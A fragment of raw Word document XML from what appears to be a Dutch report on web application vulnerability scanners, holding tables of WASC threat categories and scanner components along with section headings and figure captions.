              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Content</w:t>
            </w:r>
            <w:r w:rsidR="00B24EF5">
              <w:t xml:space="preserve"> Spoofin</w:t>
            </w:r>
            <w:r w:rsidR="005F57CF">
              <w:t>g</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C4355C" w14:paraId="3E525417" w14:textId="7D231DE8"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80BA9FB" w14:textId="24459FBB" w:rsidR="00C4355C" w:rsidRDefault="00F9236D" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4284C71E" w14:textId="0B37C41D"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473F3CB3" w14:textId="35B2C951" w:rsidR="00C4355C" w:rsidRDefault="00151CEE" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Credential/Session Predicition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C4355C" w14:paraId="17B059E3" w14:textId="60087CC3" w:rsidTr="004B5F85">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>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Aanvallen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40A72798" w14:textId="235D3828" w:rsidR="00C4355C" w:rsidRPr="00A72BD2" w:rsidRDefault="002A117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Cross-Site Scripting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C4355C" w14:paraId="1D811A3F" w14:textId="67A6DB7E"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37520DF" w14:textId="63163B95" w:rsidR="00C4355C" w:rsidRDefault="008852CA" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F7AE8D3" w14:textId="10EE3796"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073F527C" w14:textId="47D585FB" w:rsidR="00C4355C" w:rsidRDefault="002A117B" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Cross-Site Request Forgery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002836D1" w14:paraId="1CE4E6CF"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25919AB5" w14:textId="6C9A43A6" w:rsidR="002836D1" w:rsidRDefault="00ED5122" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WAC-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DE8E3A6" w14:textId="39C744A8" w:rsidR="002836D1" w:rsidRDefault="002836D1"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4A724599" w14:textId="23AF09DA" w:rsidR="002836D1" w:rsidRDefault="00CF21DF" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Denial of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002836D1" w14:paraId="0A1F8321"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Weaknesses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DF92579" w14:textId="079AEB6A" w:rsidR="002836D1" w:rsidRPr="007E389C"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Application Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002836D1" w14:paraId="26C176E5"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0E175A5B" w14:textId="3832AB3C" w:rsidR="002836D1" w:rsidRDefault="008A5B7F" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30F208E9" w14:textId="4F0F232D"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504CA0CB" w14:textId="704B86F8" w:rsidR="002836D1" w:rsidRDefault="00B04B1C" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Insecure Indexing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002836D1" w14:paraId="5EA83FFF"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Weaknesses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E24A3AE" w14:textId="0A9F4775" w:rsidR="002836D1" w:rsidRPr="00542A74" w:rsidRDefault="006C12F5"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Information Leakage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002836D1" w14:paraId="75E143DA"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514C0FC6" w14:textId="59DC184C" w:rsidR="002836D1" w:rsidRDefault="004730EE" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E05EFB3" w14:textId="3EBA1B58"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74C99EE2" w14:textId="7934BB9C" w:rsidR="002836D1" w:rsidRDefault="006C12F5" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Insufficient Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002836D1" w14:paraId="0E261ADA"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F12AF1D" w14:textId="3EF21C99" w:rsidR="002836D1" w:rsidRDefault="00623127" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WACS-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AD4DD0D" w14:textId="3DFC9117" w:rsidR="002836D1" w:rsidRDefault="007B0E31" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Weaknesses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03311CAF" w14:textId="43EB5E81" w:rsidR="002836D1" w:rsidRDefault="006C12F5" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Insufficient Athorization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002836D1" w14:paraId="70F9F579"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Weaknesses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="117C84A9" w14:textId="699E89AB" w:rsidR="002836D1" w:rsidRPr="00D066CA" w:rsidRDefault="009D067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Server Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24FACCCB" w14:textId="382A626E" w:rsidR="001514C5" w:rsidRDefault="00030C1A" w:rsidP="00C41D9B">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00294937">
        <w:t>Tabel 3.5</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306A0"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GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1612"/>
        <w:gridCol w:w="2411"/>
        <w:gridCol w:w="3963"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AF4630" w14:paraId="73992BFF"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B562FF" w14:textId="3FD1D3DB" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35271848" w14:textId="3E329CC7" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Categorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37DB5002" w14:textId="0B97C655" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Beschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="3F4A47B7"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87D3B8" w14:textId="1BE6C67D" w:rsidR="00AF4630" w:rsidRDefault="00D46861" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Proces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5639DC95" w14:textId="67A3AF45" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04D01F38" w14:textId="53AA58D8"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Voor het testen van webapplicaties zal de scanner de communicatie protocollen moeten ondersteunen die gebruikelijk zijn. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="13A72E00"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30ECF6" w14:textId="2850DB60" w:rsidR="00AF4630" w:rsidRDefault="00D46861" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Proces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1FADFCF1" w14:textId="2ED1F1AB" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Authenticatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70CD6BA3" w14:textId="74E0E40F"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De ondersteuning van authenticatie voor het testen van </w:t>
            </w:r>
            <w:r w:rsidR="009721C3">
              <w:t>webapplicaties</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="1F958943"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pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Sessie management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EC67C25" w14:textId="0946C201" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Tijdens een scan is het belangrijk dat er een sessie onderhoudt wordt.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="009B5CC9"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66E40A91" w14:textId="32854C9C" w:rsidR="00AF4630" w:rsidRDefault="00D46861" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Component/tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46BF7F85" w14:textId="3F9FBB06" w:rsidR="00AF4630" w:rsidRDefault="009559DB" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Spider/Crawler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B8BE34A" w14:textId="76BA03E6" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Crawling is een actie die uitgevoerd wordt bij het parsen van een webpagina. Hyperlinks worden verwerkt door de crawler.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="0A341814"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388A90" w14:textId="661EE622" w:rsidR="00AF4630" w:rsidRDefault="00D46861" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Proces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="634348C2" w14:textId="55763E15" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Parsing(HTML verwerking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="274B2E18" w14:textId="374CC669" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Vooraf van het scanproces is het nodig om een de website te verwerken, dit proces wordt door de webcrawler/spider gedaan.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="1529D1CA"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FB10A8" w14:textId="25869752" w:rsidR="00AF4630" w:rsidRDefault="00D46861" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Component/tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B8C6414" w14:textId="545E9CE4" w:rsidR="00AF4630" w:rsidRDefault="00C16E00" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Scanner/Tester</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23E7F835" w14:textId="11078A41"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Het testen van website op kwetsbaarheden is de </w:t>
            </w:r>
            <w:r w:rsidR="009721C3">
              <w:t>kernfunctie van een web</w:t>
            </w:r>
            <w:r>
              <w:t>applicatie scanner.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="4C550C3B"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E8A2A0" w14:textId="77572645" w:rsidR="00AF4630" w:rsidRDefault="00D46861" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Component/tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0061DF45" w14:textId="05BAE4D0" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Commando’s en controle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45BF05F9" w14:textId="0A0A62CC"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De commando’s waarmee de </w:t>
            </w:r>
            <w:r w:rsidR="009721C3">
              <w:t>webapplicatie</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> scanner wordt aangestuurd. Interactie tussen eindgebruiker en applicatie.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF4630" w14:paraId="09B35066"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5DF0EBBE" w14:textId="3605F320" w:rsidR="00AF4630" w:rsidRDefault="00D46861" w:rsidP="00C41D9B">
            <w:r>
              <w:t>Component/tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2411" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="271882F2" w14:textId="10B3D4A1" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Rapporteren</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3963" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72643788" w14:textId="2005F8A9" w:rsidR="00AF4630" w:rsidRDefault="00AF4630" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Het genereren van rapporten op basis van de gevonden kwetsbaarheden. De resultaten kunnen dan buiten de interface van de applicatie bekeken worden.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2DDCBE75" w14:textId="4F1873E8" w:rsidR="0055640C" w:rsidRDefault="00294937" w:rsidP="00C41D9B">
      <w:r>
        <w:t>Tabel 3.6</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189FE"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p w14:paraId="2C5FD1A7" w14:textId="38D70EE1"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333B0"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534DB4">
        <w:t>3.3</w:t>
      </w:r>
      <w:r w:rsidR="009A2EB9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>Webapplicatie scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711B9907" w14:textId="290D510F" w:rsidR="004A02C8" w:rsidRPr="0099118F" w:rsidRDefault="005B464A" w:rsidP="005B464A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4.1 </w:t>
      </w:r>
      <w:r w:rsidR="0099118F">
        <w:t>Inleiding</w:t>
      </w:r>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15310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Threat Modeling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2646F8EE"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73A0D"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r>
        <w:t>Acunetix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0DB4A0" w14:textId="77777777" w:rsidR="00BA13E5" w:rsidRDefault="00BA13E5" w:rsidP="0015310C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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1FE88D8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E510"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r w:rsidR="00554FF4" w:rsidRPr="00723BE8">
        <w:t>Acunetix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE82206" w14:textId="48C467AE"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6356DECA"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p w14:paraId="11D9BD1A" w14:textId="5DFCDFB1"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AA76E"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p>
    <w:p w14:paraId="69384D4F" w14:textId="0775F925"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24E89"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0528241" w:rsidR="006C390F" w:rsidRDefault="00294937" w:rsidP="006C1447">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t>Figuur 3.5</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55A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38">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9875"/>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9875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="4DDC15F3" w14:textId="6B0A68F9" w:rsidR="00E2204E" w:rsidRPr="00641B06" w:rsidRDefault="00E2204E" w:rsidP="007042EB">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="22"/>
                                <w:szCs w:val="22"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figuur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1" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:57.9pt;margin-top:220.25pt;width:297.05pt;height:21.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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4DDC15F3" w14:textId="6B0A68F9" w:rsidR="00E2204E" w:rsidRPr="00641B06" w:rsidRDefault="00E2204E" w:rsidP="007042EB">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="22"/>
                          <w:szCs w:val="22"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figuur 3.6</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E43735E" w:rsidR="00BA7602" w:rsidRDefault="00BA3D1E" w:rsidP="00BA3D1E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4.7 </w:t>
      </w:r>
      <w:r w:rsidR="003E572F" w:rsidRPr="003E572F">
        <w:t>Conclusie</w:t>
      </w:r>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515EFC9D" w:rsidR="00E2204E" w:rsidRPr="004749D1" w:rsidRDefault="00E2204E" w:rsidP="007B5B71">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rP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2"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P63jo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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="729DC7E2" w14:textId="515EFC9D" w:rsidR="00E2204E" w:rsidRPr="004749D1" w:rsidRDefault="00E2204E" w:rsidP="007B5B71">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 3.7</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9">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440DEA2D"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F0184"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1DE9CE4C" w:rsidR="00E2204E" w:rsidRPr="00B2596E" w:rsidRDefault="00E2204E" w:rsidP="00F321B8">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
